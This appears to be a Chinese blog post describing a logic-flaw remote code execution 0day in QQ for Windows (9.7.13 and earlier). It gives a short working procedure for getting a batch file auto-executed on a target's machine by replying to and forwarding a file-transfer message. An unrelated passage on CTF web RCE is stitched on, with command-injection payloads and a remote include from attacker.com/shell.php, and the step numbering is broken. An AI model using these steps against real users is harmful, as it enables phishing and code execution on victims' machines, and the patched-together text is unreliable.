最新企鹅0day-RCE

本文介绍了QQ Windows版9.7.13及以前版本存在的远程代码执行漏洞,此为逻辑漏洞,利用客户端逻辑缺陷,点击消息链接可自动下载执行。文中说明了漏洞原理、演示步骤,还给出处置建议,如谨慎点击链接、安装终端安全软件。

1.洞详情

漏洞名称: 企鹅客户端远程代码执行漏洞威胁程度:该漏洞为逻辑漏洞,利用企鹅客户端的逻辑缺陷进行攻击,被攻击方在点击消息内容(链接) 时,不会弹窗提示,自动下载执行,在攻击者利用的层面,可降低攻击者钓鱼等攻击手段的难度。

2.处置建议:

1、提示用户谨慎点击消息链接

2、升级或安装终端安全软件,用于检测落盘的文件是否异常

漏洞类型:0day

厂商:腾讯

产品官网链接: https://im.qq.com/pcqq

影响范围:QQ Windows 版 9.7.13 及以前版本漏洞所在

功能模块:文档传输下载模块漏洞攻击效果:远程代码执行

3.漏洞原理

该漏洞为逻辑漏洞,企鹅windows客户端的“文件传输消息”在经过“回复消息”功能处理后,该文件会变为无需任何弹窗确认,点击消息文本后即可自动下载并打开文件的处理方式。

4.漏洞演示

4.1新建一个文本文档,需要打开计算器的话,在文本文档里输入calc,记事本则输入notepad,画板输入mspaint,然后将文本文档另存为xxx.bat(xxx为名称,自己起一个,比如计算器的话,可以起名为计算器.bat)例如1.bat,将1.bat发送给自己,产生一个文件传输消息在聊天窗口中。

4.3在天窗口中回复该消息,发送给自己 

4.4转发最后一次发送的消息给目标

仅给定的引用内容未涉及polarctf-web-rce相关信息。一般而言,Web RCE(Remote Code Execution,远程代码执行)漏洞是一种严重的安全漏洞,攻击者可利用该漏洞在目标Web服务器上远程执行任意代码。 在CTF竞赛中,针对Web RCE漏洞的利用方法通常有以下几种: - **命令注入**:若Web应用程序在处理用户输入时未进行严格过滤和验证,攻击者可通过构造恶意输入,将系统命令注入到应用程序调用的命令中执行。例如,在一个接受用户输入作为系统命令参数的PHP页面中,攻击者可构造类似 `;ls -l` 的输入来执行 `ls -l` 命令。示例代码如下: ```php <?php $input = $_GET['input']; system("ping -c 4 " . $input); ?> ``` 攻击者可通过构造URL `http://example.com/test.php?input=127.0.0.1;ls -l` 来执行 `ls -l` 命令。 - **代码注入**:当Web应用程序动态执行用户提供的代码时,攻击者可注入恶意代码。比如在一个支持用户输入Python代码并执行的页面中,攻击者可输入恶意的Python代码来获取系统信息或执行其他操作。示例代码如下: ```python code = input("请输入Python代码:") exec(code) ``` 攻击者可输入 `import os;os.system('ls -l')` 来执行 `ls -l` 命令。 - **文件包含漏洞利用**:若Web应用程序存在文件包含漏洞,攻击者可通过包含恶意文件来执行代码。例如,在一个PHP应用中,若存在如下代码: ```php <?php $file = $_GET['file']; include($file); ?> ``` 攻击者可构造URL `http://example.com/test.php?file=http://attacker.com/shell.php` 来包含并执行攻击者服务器上的恶意PHP文件。 在polarctf中,要发现和利用Web RCE漏洞,通常需要对Web应用进行全面的安全测试,包括对输入点的测试、对应用程序代码的审计等。同时,还需要了解目标应用所使用的技术栈和环境,以便更精准地发现和利用漏洞。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值